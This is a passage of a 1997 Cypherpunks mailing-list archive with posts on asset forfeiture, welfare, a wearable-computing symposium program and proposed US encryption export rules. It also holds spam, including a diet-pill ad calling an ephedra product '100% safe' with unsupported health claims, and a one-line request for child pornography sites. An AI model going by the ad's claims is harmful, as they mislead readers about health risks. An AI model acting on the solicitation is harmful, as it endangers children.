> >       the Constitution, enslave the people, and rule the world.
>
> "Like them new Stealth Helicopters, equipped with devices to drown out
> the sound."

  I was watching a 'crop' in Humbold County, CA, in the early 80's
and was standing near the top of a hill one day when I heard a
slight "whoosh, whoosh" for about three seconds before a helicopter
came over the hill, scaring the living shit out of me.
  I imagine that in the 15 or so years since then, the govt has
managed to make them invisible, as well.

  The Campaign Against Marijuana Production (CAMP) was interesting,
with the Federal government supplying the toys, and the heavily
armed troops consisting of 'volunteers' from various agencies and
LEA's.
  At the time, I wondered if one of the purposes of CAMP was to
enable local law enforcement personnel from around the nation to
do 'male bonding' with Big Brother. Now I believe that history
has proven me correct.
  A varitey of other Federal policies, laws and regulations also
seem aimed at drawing local and regional LEA's into Big Brother's
spreading web.

  The confiscation of drug-related assets, for instance, allows
the LEA's in Louisianna to confiscate the vehicles of a multitude
of out-of-state visitors under the slimmest of pretexes.
  The Feds have basically put local LEA's in their back pocket by
letting them play with their hi-tech toys and sharing the spoils
of the War Against the Citizens.

  One of the people who have had their vehicle wrongfully seized
under the drug-related confiscations laws received the car as a
gift. Now the IRS is still demanding that he pay a 'gift tax' on
the vehicle, even though he only had it for a few days.
  The increasing cooperation between Federal, State and local
LEA's has brought a whole new meaning to the words, "The line
forms to the rear."

DisgustedMonger







From nobody at REPLAY.COM  Sun Aug 24 03:42:22 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 24 Aug 1997 18:42:22 +0800
Subject: Welfare Solution #389
Message-ID: <199708241031.MAA29938@basement.replay.com>



Tom Mix wrote:

> I could imagine that a junkie who takes some old lady's purse to buy
> heroin is victimizing the old lady, but is a student smoking marijuana
> and drinking a beer victimizing anyone? What about a heroin junkie who
> is rich, though unpopular, and never committed any other crime? Have
> they made themselves a victim of something? Maybe so...the needle,
> the darkness, the overwhelming Love Which Cannot Be Real. But the
> state shouldn't recognize "mystical entities" like this as perpetrators.
> The person in this case is making a choice; they will do no harm but
> to themselves. Are they then a victim, or a perpetrator, or both?

-- Excerpt from "Victim" (c) County Mountie Productions --

{Passage sung by purse snatcher who is mugging little old lady.}
	"I knocked her dowm, stepped on her face,
	 Slandered her name all over the place.
	 Hit her with my fist, kicked her with my shoe,
	 	"I said, "Lady, I'm a victim.
	 	 A victim, just like you.
		 I'm a victim of a Bad Attitude."
--

  When this song was recorded, it was somewhat tragically ironic,
but it proved to be prophetic.
  I believe that "Bad Attitude" is now a recognized psychiatric
illness, allowing one a reduced sentence and monetary support
from the government while the poor victim of "Bad Attitude"
takes "the cure" on the beaches of the Hawaii.

  I know a man in Tucson who worked all his life, spent all of 
his money recovering from an accident, and then couldn't get
welfare money when he needed a few more months of recuperation
before returning to work.
  The lady who turned him down made the mistake of commenting
that it was a shame he wasn't a drug addict, because then he
would "qualify" for welfare. The man lived on the streets for
several months, barely surviving, until he was healthy enough
to work, and he has never paid a dime in taxes since then.
  What is even more atrocious is that a church that he attended
occasionally turned down his request for minimal assistance,
because their policy was to only help those who qualified for
government benefits (in order to help weed out the "bums").
He wasn't "entitled" to the church's help as a Christian, but
he would have been, as an agnostic junkie.

  I met the man in the park, and gave him a place to live for
the last month of his recuperation, so he could shit, shower,
shave and use it as a base to look for work. In the next two
years, the company he went to work for bought around $50,000
worth of computers from me.
  Before this experience, the man was a "God and Country" type
of individual who probably would have turned in anyone he found
was "cheating" on their taxes. Now he is perfectly willing to
go to jail rather than give the robber barons their booty.






From rah at shipwright.com  Sun Aug 24 05:43:12 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sun, 24 Aug 1997 20:43:12 +0800
Subject: Oct 13-14 IEEE International Symposium on Wearable Computers(ISWC)
Message-ID: 




--- begin forwarded text


Date: Sun, 24 Aug 1997 03:22:15 -0500
From: 
To: technomads at UCSD.EDU
Subject: Oct 13-14 IEEE International Symposium on Wearable Computers (ISWC)


Actually, Steve, can you use this one instead?

						Thad Starner
						MIT Media Laboratory
						Wearable Computing Project

--------------------------------------
Oct 13-14 IEEE International Symposium on Wearable Computers (ISWC)

The International Symposium on Wearable Computers (ISWC) is the first
annual conference on computers that are worn as clothing.  The
conference is peer reviewed and sponsored by the IEEE Computer
Society.  The purpose of ISWC is to bring together researchers,
product vendors, research sponsors, and other interested persons to
share information and advances in wearable computers and augmented
reality.  The conference will include paper presentations,
exhibitions, and poster sessions.

	Registration is now open at

http://mime1.marc.gatech.edu/wearcon/

	Reserve your space before SEPTEMBER 1ST for the best hotel rates.

	A list of topics from the CFP and the advance program is below.

	Please forward!

						Thad Starner
						MIT Media Laboratory
						Wearable Computing Project
--------------
>From the CFP:
CONFERENCE TOPICS
The topics for ISWC may include:

        o  Applications, including affective computing, augmented
           reality, computer-supported collaborative work,
           computer-supported cooperative living, ubiquitous
           computing, personal imaging, consumer applications,
           industrial applications, medical applications, military
           applications, and software agents
        o  Ergonomics
        o  Future of wearable computing
        o  Hardware, including head-mounted display technologies,
           batteries, power management, heat dissipation
           techniques, industrial design techniques, and
           manufacturing packaging issues
       	o  Human interface issues, including hands-free user
       	   speech recognition, mobility-challenged users, user
       	   modeling, user evaluations, and health issues
        o  Networks, including wireless networks, on-body networks,
           the World Wide Web, and networked vs. standalone
           computers
        o  Operating system issues
        o  Social implications
        o  Software architectures
        o  Training, including performance support systems

----------

International Symposium on Wearable Computers
Advance Program

Monday, October 13, 1997

8:00 - 8:30 Coffee, Put Up Posters I

8:30 - 8:40 Opening Remarks

8:40 - 10:10 Evaluation Studies

Evaluation of three input mechanisms for wearable computers by
B. Thomas, S. Tyerman, and K. Grimmer

Wearable computers for performance support by
J. Ockerman, L. Najjar, and C. Thompson

A field usability evaluation of a wearable system by
J. Siegel and M. Bauer

10:10 - 10:30 View Posters I, Demos, Coffee

10:30 - 12:00 Industrial and Business Applications

Mobile approach support system for future machine tools by
R. Daude and M. Weck

Factory Automation Support Technology (FAST):  A new paradigm of
continuous learning and support using a wearable by
C. Thompson, L. Najjar, and J. Ockerman

Wearable computers for three-dimensional CSCW by
 M. Billinghurst, S. Weghorst, and T. Furness III

12:00 - 1:30 Lunch

1:30 - 3:00 New Hardware, Software Technology

Eyeglass-mounted displays for wearable computing by
M. B. Spitzer, N. M. Rensing, R. McClelland, and P. Aquilino

Intrabody buses for data and power by
R. Post, M. Reynolds, M. Gray, J. Paradiso, and N. Gershenfeld

Software organization for dynamic and adaptable wearable systems by
S. Fickas, G. Kortuem, and Z. Segall

3:00 - 4:00 View Posters, Demos, Coffee

4:00 - 6:00 Invited Talks

Dick Urban, DARPA
Rick Satava, DARPA
Jerry Bowskill, BT
David Mizell, Boeing

6:00 - 6:30 Take Down Posters I, Demos

----

Tuesday, October 14, 1997

8:30 - 9:00 Coffee, Put Up Posters II

9:00 -10:00 Personal Applications

An historical account of wearable computing by
S. Mann

A touring machine:  Prototyping 3D mobile augmented reality
systems for exploring the urban environment by
S. Feiner, B. MacIntyre, T. Hollerer, and A. Webster

10:00 - 10:30 View Posters II, Demos, Coffee

10:30 - 12:00 New Sensors, Displays

Tactual displays for wearable computing by
H. Tan and A. Pentland

Affective wearables by
R. W. Picard and J. Healey

A sensate liner for personnel monitoring applications by
E. Lind, S. Jayaraman, R. Rajamanickam, R. Eisler, and T. McKee

12:00 - 1:30 Lunch

1:30 - 3:00 Communications

Canard:  A framework for community messaging by
P. Chesnais

Metronaut:  A wearable computer with sensing and global
communication capabilities by
A. Smailagic

The wearable remembrance agent:  A system for augmented memory by
B. Rhodes

3:00 - 4:00 View Posters II, Demos, Coffee

4:00 - 5:30 Using Wearable Sensors

A wearable computer based American Sign Language recognizer by
T. Starner, J. Weaver, and A. Pentland

Stochasticks:  Augmenting the billiards experience with
probabilistic vision and wearable computers by
T. Jebara, Cyrus Eyster, J. Weaver, T. Starner, and A. Pentland

Towards situated computing by
R. Hull, P. Neaves, and J. Bedford-Roberts

5:30 - 6:00   Take Down Posters II, Demos

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From ynter at spica.net  Sun Aug 24 21:01:31 1997
From: ynter at spica.net (ynter at spica.net)
Date: Sun, 24 Aug 1997 21:01:31 -0700 (PDT)
Subject: START YOUR OWN BUSINESS...
Message-ID: <>


                 UNLIMITED REVENUE WITH OUR SOFTWARE
   OVER 3000 PEOPLES LIKE YOU ALREADY MAKE A NICE LIVING
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 
IF YOU WNAT TO BE REMOVE FROM our recipient list don't hit REPLY. 
Just send any message to: 
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

4000 new productS? Start a new business or ad some new products to your existing line..
40,000 names of manufacturers and wholesalers from places like "Taiwan ,Korea, Malaysia, JAPAN" 
and other country around the world. Products you can buy so low, you can make a fortune reselling to
wholesalers or retailers 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
OR START A NEW BUSINESS WITH EVERYTHING READY TO OPERATE
INCLUDING YOUR OWN WEB PAGE ON A SECURE SERVER..
                       ---------------------------------------------------------------------

 You can download a demo disk directly on the site.and get started in the same day .
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
We are very sorry if this NOTICE reach YOU by error.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$






From ynter at spica.net  Sun Aug 24 21:01:31 1997
From: ynter at spica.net (ynter at spica.net)
Date: Sun, 24 Aug 1997 21:01:31 -0700 (PDT)
Subject: START YOUR OWN BUSINESS...
Message-ID: <>


                 UNLIMITED REVENUE WITH OUR SOFTWARE
   OVER 3000 PEOPLES LIKE YOU ALREADY MAKE A NICE LIVING
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 
IF YOU WNAT TO BE REMOVE FROM our recipient list don't hit REPLY. 
Just send any message to: 
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

4000 new productS? Start a new business or ad some new products to your existing line..
40,000 names of manufacturers and wholesalers from places like "Taiwan ,Korea, Malaysia, JAPAN" 
and other country around the world. Products you can buy so low, you can make a fortune reselling to
wholesalers or retailers 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
OR START A NEW BUSINESS WITH EVERYTHING READY TO OPERATE
INCLUDING YOUR OWN WEB PAGE ON A SECURE SERVER..
                       ---------------------------------------------------------------------

 You can download a demo disk directly on the site.and get started in the same day .
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
We are very sorry if this NOTICE reach YOU by error.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$






From jya at pipeline.com  Sun Aug 24 07:16:13 1997
From: jya at pipeline.com (John Young)
Date: Sun, 24 Aug 1997 22:16:13 +0800
Subject: NYT on Draft Crypto Regs
Message-ID: <1.5.4.32.19970824135750.00728420@pop.pipeline.com>



Peter Wayner reports in the on-line New York Times today on 
the draft BXA encryption regs being circulated among 
government agencies for comment. Peter highlights the proposed
new restrictions on electronic distribution of crypto. Adam Shostack
is quoted:

   http://www.nytimes.com/library/cyber/week/082497encrypt.html

For those unable to access the NYT site, we've put a copy at:

   http://jya.com/bxa-nyt.htm

We remind that a July 25 version of the draft regs is available at:

   http://jya.com/bxa-ei-rule.htm






From tnapt at savetrees.com  Sun Aug 24 22:42:51 1997
From: tnapt at savetrees.com (tnapt at savetrees.com)
Date: Sun, 24 Aug 1997 22:42:51 -0700 (PDT)
Subject: How to Make A Little Money and Have a Lot of Fun on the Internet
Message-ID: <0000000000.AAA000@savetrees.com>


Hello I would like to present to you - the next generation of online
automated income generating, marketing, and lead generation services 
along with web and home page design software.

Does to POTENTIAL of earning CASH in you mailbox SIX DAYS A WEEK ON A
GLOBAL SCALE excite you?  A fully automated online system generates
cash pouring into your mailbox from the global Internet community.

Now you can enter the profitable world of becoming an Internet
business development service provider and turn your personal
computer into a CASH REGISTER!

By using this FREE SELF-REPLICATING home page service, you will have
the tool that will deliver to you the POTENTIAL of having literally
thousands of customers paying CASH IN ADVANCE for information on
business development only you can provide.

*  NO INVENTORY  *  NO CORPORATE OFFICE  *  NO MEETINGS  *
  *  NO PRODUCTION QUOTA  *  NO PRODUCTS TO INVENTORY  *
                  *  COMPLETELY AUTOMATED  *
          **************  NO KIDDING!  **************

-----------------------------------------------------------------
JUST CASH!
        Lots and lots of CASH!
                You can recieve CASH in your mailbox DAILY!
-----------------------------------------------------------------

People will want to read about these services and software.
Want more information??

Click here..   mailto:seypop2 at answerme.com

Even though you are on our in-house Internet Marketing list at your
request or because you have previously accessed one of our URL's or
autoresponders, your online privacy is respected.  If you wish to be
removed from future mailings, please reply by typing the word "remove"
in the subject line and click send.  This software will automatically
block you from future mailings.







From XAVIER243 at aol.com  Sun Aug 24 07:45:34 1997
From: XAVIER243 at aol.com (XAVIER243 at aol.com)
Date: Sun, 24 Aug 1997 22:45:34 +0800
Subject: Child Porn
Message-ID: <970824103216_1387541072@emout17.mail.aol.com>



Got any info or sites 4 me???






From lutz at iks-jena.de  Sun Aug 24 07:58:20 1997
From: lutz at iks-jena.de (Lutz Donnerhacke)
Date: Sun, 24 Aug 1997 22:58:20 +0800
Subject: Mathematics > NSA + GCHQ
In-Reply-To: 
Message-ID: 



* Lucky Green wrote:
>Now imagine if the prize was $1,000,000 or $10M. That's real money to just
>about every student out there. Every box at every university would be

Or remember the CCC project: They collect US$ 400,000 to build there own
public Wiener machione to break DES regulary...






From ravage at ssz.com  Sun Aug 24 08:10:09 1997
From: ravage at ssz.com (Jim Choate)
Date: Sun, 24 Aug 1997 23:10:09 +0800
Subject: index.html
Message-ID: <199708241505.KAA29590@einstein.ssz.com>



    CNN logo 
   Navigation 
   
   Infoseek/Big Yellow 
   
   
   Pathfinder/Warner Bros 
   
   
   
   
   
   
   
     _________________________________________________________________
   
   What's on
   CNN
     _________________________________________________________________
   
   Health banner Taking the pulse of family health & fitness rule
   
              REPORT: U.S. TO PAY HOSPITALS NOT TO TRAIN DOCTORS
                                       
      Doctor graphic August 24, 1997
     Web posted at: 10:22 a.m. EDT (1422 GMT)
     
     WASHINGTON (CNN) -- In an effort to reduce a glut of physicians in
     the United States, the federal government will pay training
     hospitals hundreds of millions of dollars not to train doctors, The
     Washington Post reported Sunday.
     
     The initiative, part of the new federal budget agreement, also for
     the first time essentially forbids hospitals from increasing the
     size of their residency programs, the paper reported.
     
     Medicare underwrites residency training programs heavily. Taxpayers
     spend $7 billion a year on the training, with each resident
     translating into an average subsidy of $100,000 a year.IN CONTEXT
     
     Medicare spends up to $7 billion a year on physician training
     programs. But with one physician for every 380 people in the United
     States, critics say the government is paying for more doctors than
     it needs.
     
     Under the new plan, Medicare will instead pay hospitals to shrink
     their residency programs. Hospitals that voluntarily reduce
     residency training programs by 20 to 25 percent over five years will
     get the full amount of the lost subsidies for the first two years,
     with payments tapering off over the next three years, the newspaper
     said.
     
     After five years, the payments will cease, leaving the program with
     fewer residents to underwrite. Administration health officials and
     leading Republicans say the program will save Medicare money in the
     long run, the Post reported.
     
     The payments are the government's first effort to constrict the
     pipeline of people entering the medical profession, and one of the
     few times the federal government has used subsidies as leverage to
     shrink a particular work force.
     
  New York tried program first
  
     
     
     The program mirrors an experimental program in New York endorsed by
     the Clinton administration earlier this year.
     
     Under the agreement between the Greater New York Hospital
     Association and the federal Health Care Financing Administration,
     which runs Medicare, New York is to receive $400 million over
     several years to train fewer doctors, especially in those in certain
     specialties.
     
     Of the state's 75 teaching hospitals, the Post reported, 42 signed
     up for the program -- nearly four times as many as expected.
     
     But the agreement drew fire from teaching hospitals in other areas
     of the country who were cutting their residency rolls voluntarily
     and absorbing the cost of the lost subsidies without federal
     assistance.
     
  Some say agreement may have been unnecessary
  
     
     
     Some government officials quoted by the Post said the glut of
     doctors, particularly specialists, in the United States was a
     growing problem, and argued that the budget agreement was a valuable
     cost-cutting tool. "It remains a voluntary matter of choice for
     these teaching hospitals. It isn't a mandate," said Ari Fleischer, a
     spokesman for committee chairman Rep. Bill Archer, R-Texas.
     
     Others wondered whether it was necessary. The number of doctors
     training to become specialists in some fields has declined
     dramatically despite the subsidy program, the Post article said, due
     to well-publicized warnings that jobs for specialists were only
     available in less populated areas.
     
     The United States boasts over 700,000 physicians, more per capita
     than any other country.
     
    
   rule
   
  Related story:
  
     * Welcome to washingtonpost.com
          + washingtonpost.com: National News
   
  Related site:
  
     Note: Pages will open in a new browser window
     * Health Care Financing Administration - The Medicare and Medicaid
       Agency
       
     
     
     External sites are not endorsed by CNN Interactive.
     
   
     _________________________________________________________________
   
   Infoseek search ____________________ ____  ____
   
     _________________________________________________________________
   
   
   rule Message Boards Sound off on our
   message boards
   
   You said it... [INLINE] Taking the pulse of family health & fitness
   rule
   To the top 
   
   
   � 1997 Cable News Network, Inc.
   All Rights Reserved.
   
        Terms under which this service is provided to you.






From 75402529 at delphi.com  Mon Aug 25 01:11:23 1997
From: 75402529 at delphi.com (75402529 at delphi.com)
Date: Mon, 25 Aug 1997 01:11:23 -0700 (PDT)
Subject: More Energy ... Less Fat !!! (3 day trial)
Message-ID: 


**************************************
EAT THE FOODS YOU LOVE
NO WILL POWER REQUIRED
**************************************
Anyone who has struggled to lose weight, like I did, 
can tell you DIETS ALONE DON'T WORK !  
That's because the difference between thin and overweight 
individuals has more to do with metabolic rate than what 
they eat.  It's believed most lean individuals have a
metabolism designed to BURN FAT !

We have designed a product that works
several ways to help you achieve maximum
results from your weight-loss program. This
unique blend of herbs, botanicals and Chromium
Picolinate, improves your metabolism so
your body relies more on stored fat and 
less on stored proteins.
"LOSE THE FAT....
       NOT THE MUSCLE"

Typically, up to 30% of lost weight is
muscle.  This lowers your metabolic rate and
slows calorie-burning.  This lowered metabolic
rate makes it hard to keep lost pounds from
creeping back.  Result: the "Yo-Yo" syndrome
in which weight is repeatedly lost and then 
regained.  After each lose-gain cycle the 
portion of fat increases.

To break this vicious cycle, it is important
to lose only fat while maintaining, or even 
increasing muscle.  Studies show that optimal
chromium nutrition is an effective part of long-term
fat-loss programs.  Our unique formula of 
specialized herbs and botanicals is coupled 
with the best source of chromium available,
patented Chromium Picolinate.

HERE'S EVIDENCE !

Several double-blind crossover studies
conducted along with clinical and laboratory
tests at a leading university and hospital have 
proven that the ingredients in this product are 
effective.

Without changing dietary or exercise
habits, over a six-week period, subjects in 
separate studies lost an average of 23% body fat or
approximately 4.4 lbs. of fat, and increased lean 
body mass by 1.5 lbs.

People over the age of 46 did even better,
and women seemed to do the best.  People
with elevated cholesterol levels averaged a 10%
drop in LDL cholesterol.

          WHAT EXACTLY IS 
      CHROMIUM PICOLINATE?

It's a bioactive chromium with clinically
proven benefits.  Chromium is vital to
good health and is essential for the efficient
functioning of insulin.  Poor responsiveness to 
insulin is common and is linked with increased
risk of being overweight, heart disease, elevated
blood fat, high blood presure and diabetes.

Over 90% of American diets provide much
less than the minimal amount of chromium
recommended by The National Academy
of Science.  Most forms of chromium are not
easily absorbed by the body, but chromium
picolinate, being bioactive, is easily absorbed.
In fact, it has been shown to reduce body fat,
lower cholesterol and even reduce elevated
block-sugar in diabetics.

THE DIET BREAKTHRU OF THE CENTURY !!

"Over the last 10 years, I have tried a variety of 
weight loss methods, spent thousands of dollars 
and failed at all of them.  By December 1995, I
was the heaviest I had ever weighed-235 lbs.
I had no energy.  My self-esteem had hit rock
bottom... I was introduced to Thermo Lift and 
have never looked back! My energy level has
boosted and my weight loss increased... In total
I have lost 70 lbs. and went from a size 22 to a
size 12.  The most amazing part - It's So Easy!"
Becky

"I began using Thermo-Lift the seventh week of 
gymnastics training to achieve a specific result: a
washboard stomach.  By the end of the eighth week
all I could see were solid stomach muscles!  I
recommend Thermo-Lift to all my muscle therapy
clientele for its superior fat burnng and muscle toning
abilities."   Chris

"I had tried everything to lose weight but nothing worked.
With Thermo-Lift I was amazed at how quickly I lost
weight - 4 pounds in 4 days! My energy level has 
sky rocketed and it's helped me curb my chocolate  
binges.  Thanks!!"       Gloria

      100% SAFE AND NATURAL!

       THE INGREDIENTS

Chromium Picolinate: Helps your body use stored fat for
energy while maintaining lean muscle mass.

Bee Pollen:  Effective for combating fatigue,
depression, and colon disorders.

Siberian Ginseng:  Is a good source of energy and
endurance, as well as mental and physical vigor.

Gota Kola:  Aids in the elimination of excess fluids, 
fights fatigue and depression.

Guarana Extract:  Increases mental alertness and fights
fatigue.  A very high energy source.

Ma Huang Extract:  Helps to increase energy; controls
appetite.

Also includes:  White Willow Bark, Bladderwrack, 
Reishi Mushroom, Rehmannia Root, Ginger Root,
Licorice Root, and Astralagus.

     NUTRITIONAL BREAKTHROUGH!

Now You Can Safely Shed Unwanted Fat -
Without Dieting Or Strenuous Exercise!  It's The
Way To Firm Up Without Giving Up The Food
You Love!

            IT'S SO EASY !

All You Do Is Take One Capsule Twice A Day!
No Messy Powders! No Starvation Diets! You'll
Lose Weight And Feel Great!

          IT REALLY WORKS!

Thermo Lift Improves Your Metabolism So Your
Body Burns Excess Fat!  The Result Is A Leaner, 
Trimmer, Firmer Physique!!

     Order your Thermo-Lift today!
     One - month supply is only $29.95

*************************************************************
SPECIAL - TRIAL SIZE !!!!!
*************************************************************
3 Day Trial Size for $3.00
       If you order within the next 5 days
( For trial size - include a self addressed stamped
           letter size envelope )


Fill out and Mail In:
YES!! Please rush me a one - month supply of 
Thermo-Lift!  Enclosed is a check/money order for
$32.95 (includes $3.00 Shipping).

Name:___________________________

Address:_________________________

City:____________________________

State:____________Zip:____________

Phone:__________________________

Email Address:____________________


Mail to:
Dynamic Marketing Solutions
Dept. DSM824
P.O. Box 79057
Houston,Texas 77279

The information contained in the report was derived from many medical,
nutrional and media publications.  It is not intended for medical or nutritional
claims but for information and educational purposes.  Please consult a health
professional should the need for one be indicated.


This is a NO DIET, NO WILL POWER, 
easy  to LOSE WEIGHT!!

Lose Weight, Eliminate FATIGUE, and FEEL GREAT!!!






From anon at anon.efga.org  Sun Aug 24 11:12:40 1997
From: anon at anon.efga.org (Anonymous)
Date: Mon, 25 Aug 1997 02:12:40 +0800
Subject: Drastic crypto crackdown
Message-ID: 



>From the New York Times cybertimes:

Proposed U.S. Rules Would Slow
Encryption Software Downloads

By PETER WAYNER 

Under a proposed set of rules being circulated by the Commerce
Department, the Clinton Administration is considering regulating
Web servers that allow people to download encryption software.

Among the sites that would be affected are those now operated by
companies like Netscape, Pretty Good Privacy, and Microsoft, all
of which distribute software over the Web. Under the proposed rules,
access to such sites would be more tightly controlled or could
disappear altogether in the future.

The proposed new regulations would be modifications to the Export
Administration Regulations used by the Bureau of Export Affairs in
the Commerce Department to regulate the flow of encryption software
from the United States. The Commerce Department took control of
the regulations at the beginning of 1997 from the State Department
after the software industry pushed for a more responsive bureaucracy.

The version of the regulations being circulated is an interagency
draft, a document designed to give other agencies, like the Federal
Bureau of Investigation or the National Security Agency, the chance
to comment on them. For this reason, Commerce Department refused
to comment until the new rules are published in the Federal Register.

The spokeswoman from the Commerce Department also refused to check
the authenticity of the proposal, a copy of which was given to
CyberTimes by a software industry representative. Several other
industry representatives confirmed that the document was legitimate.

Most of the new regulations involve tuning the details of the
administration's key-recovery plan, which would allow industry to
export software with a built-in back door for the police to use to
gather evidence. For instance, the new regulations would require
key-recovery encryption software to be injected into the message
stream for law enforcement use at least every three hours.

The requirement for Federal approval of a Web server, however, is
buried inside the densely written, virtually impenetrable document,
and the change is not even noted in the executive summary at the
beginning. The new regulation would require that anyone setting up
a Web server offering encryption software seek an "advisory opinion"
from the Bureau of Export Affairs.

The opinions carry no weight in court and only serve as an indication
of the agency's view on the matter at a given moment. A company
could later be prosecuted for exporting software despite receiving
permission in an advisory opinion, although the existence of the
opinion should offer some emotional support with the court.

The purpose of the rule is to force the Web server to take all
prudent steps to ensure that encryption software is not leaving
the country. Currently, companies like Netscape or PGP ask anyone
requesting encryption software to fill out a form certifying that
they were not breaking the law. They also check the destination
domain to ascertain whether the receiving computer was located
within the United States. They could then deliver the software over
the Web without waiting for any government action.

The proposed regulations do not set out any hard and fast guidelines
for a company to meet. They only suggest that sites that allow
encryption downloads include an "access control system either
through automated means or human intervention, (that) checks the
address of every system requesting or receiving a transfer and
verifies that such systems are located within the United States or
Canada."

When Netscape originally set out to distribute the version of its
browser with high-grade encryption over the Internet, the company
sought the opinion of the State Department, which gave permission
in their version of an advisory opinion. But the new regulations
would effectively force Netscape to shut down its Web servers until
the Commerce Department could rule again -- a process that can take
several months.

This waiting time is what worries companies.  Although Vice President
Al Gore promised that the Commerce Department would reply promptly
to all applications, delays have increased for companies since the
beginning of the year.  Those delays, in turn, stymie widespread
distribution of new software.

This new regulation frustrates Peter Harter, global public policy
counsel at Netscape. "It seems to be inconsistent with the Vice
President's 'do no harm' promise to treat commerce online the same
as commerce for physical stores," Harter said. "I'm not aware of
any procedure that would require retail stores such as Fry's or
Egghead to apply to the Commerce Department."

Netscape depends heavily on electronic distribution to provide its
customers with the latest version of its products. New versions
that fix bugs and plug security holes are made available on the
Web as soon as possible. The regulations are ambiguous enough that
they may require a company to seek separate approval for every new
server it installs.

Kelly Huebner Blough, director of government relations for Pretty
Good Privacy, said:  "When we first release a product, it's available
off the Web. Then a few weeks later you can order a product in a
package." The company currently sells about 15 percent of its new
packages through the Web and it hopes to sell more that way, she
said.

Pretty Good Privacy is also in direct competition with Entrust
Technologies Ltd., a Canadian encryption software company that is
allowed to sell many of its Entrust products throughout the world.
Canadian regulations permit export of full-strength encryption
software to most parts of the world if the software is developed
entirely within Canada.  The company's Web server does check domain
names to detect whether the software might be going to Libya, Iran,
Iraq, Cuba, Angola, Syria, North Korea, France or Singapore.

The software industry worries that the Administration's proposed
regulations will restrict the growth of Internet commerce because
encryption is a crucial tool for secure transactions. While most
software companies do not include encryption technology at this
time, many suggest that its use will continue to grow because
encryption is the best defense against fraud on the Net. Banks,
for instance, may find that the regulation is another regulatory
burden to providing online banking.

Stewart Baker, a former general counsel for the National Security
Agency who now practices at the Washington law firm Steptoe &
Johnson, said that the difficulty the regulators face is that the
regulations must adapt to a quickly changing Internet environment.

"They're saying 'Here's the basic standard. Show us what you're
trying to do. If you're doing what we feel is a good faith effort,
then we'll approve it,'" Baker said. "They don't quite say that,
but I suspect that's what's going on."

To draw an analogy, he compared the action to a hand check in
basketball, a move by which a defensive player warns someone with
a ball that they're there by touching them.

Adam Shostack, a Boston-based consultant to several major banks
and financial institutions, said that the current rules were already
making it difficult for his clients to take care of their foreign
customers. The new regulations, Shostack predicted, will just make
matters worse.

"We've never needed the permission of the government to publish
anything in this country," Shostack said. "I don't see where their
legal authority comes from. You can't make reasonable business
plans when they reserve the right to change the rules in bizarre
and unconstitutional ways."

The rest of the proposed regulatory changes would provide clarifications
to unanswered questions that others have had. For instance, source
code could be shipped without restriction to Canada without a
license if the new regulations are adopted. Software could also be
shipped to Bulgaria, the Czech Republic, Hungary, Poland, Romania
and Slovakia without support documentation.






From alan at ctrl-alt-del.com  Sun Aug 24 11:47:16 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Mon, 25 Aug 1997 02:47:16 +0800
Subject: David Downey asks to be shot
In-Reply-To: 
Message-ID: <3.0.2.32.19970824111716.04061980@ctrl-alt-del.com>



At 01:34 PM 8/23/97 -0400, Rabid Wombat wrote:
>
>We'll fall-in out in the compound as soon as Tim finds his shoes.

"Shoes for Cypherpunks! Shoes for the dead! Shoes for Cypherpunks!  Where
would a Cypherpunk be without his shoes?"


---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano at teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan at ctrl-alt-del.com|






From cpunks at www.video-collage.com  Sun Aug 24 11:53:15 1997
From: cpunks at www.video-collage.com (Cypherpunks Maintenance Account)
Date: Mon, 25 Aug 1997 02:53:15 +0800
Subject: North American Crypto Archive status (fwd)
Message-ID: <199708241847.OAA25138@www.video-collage.com>



----- Forwarded message from Michael Paul Johnson -----

>From cpunks  Mon Aug 11 00:38:22 1997
Message-Id: <3.0.3.32.19970810222548.00923ad0 at teal.csn.net>
X-Sender: mpj at teal.csn.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32)
Date: Sun, 10 Aug 1997 22:25:48 -0600
To: coderpunks at toad.com
From: Michael Paul Johnson 
Subject: North American Crypto Archive status
Sender: owner-cypherpunks at toad.com
Precedence: bulk

-- Start of PGP signed section.

WHAT HAPPENED TO THE NORTH AMERICAN CRYPTO ARCHIVE?

The North American Crypto Archive at http://www.sni.net/~mpj/crypto.htm is
rather limited right now. I have deleted everything except the few files that
I contributed to the site. This was to save money, since I suddenly lost some
sponsors (who wish to remain anonymous, but I appreciate them greatly) who
were paying for the costs associated with the site. I am still planning to
resurrect the North American Crypto Archive, but this will likely take a
while. I think that almost all of the files were successfully rescued before
the site went down by at least one person. Note that much of what was there
can be found by following the links at http://www.sni.net/~mpj/freecrypt.htm
or by using appropriate search utilities.


WHY RESURRECT THE NORTH AMERICAN CRYPTO ARCHIVE?

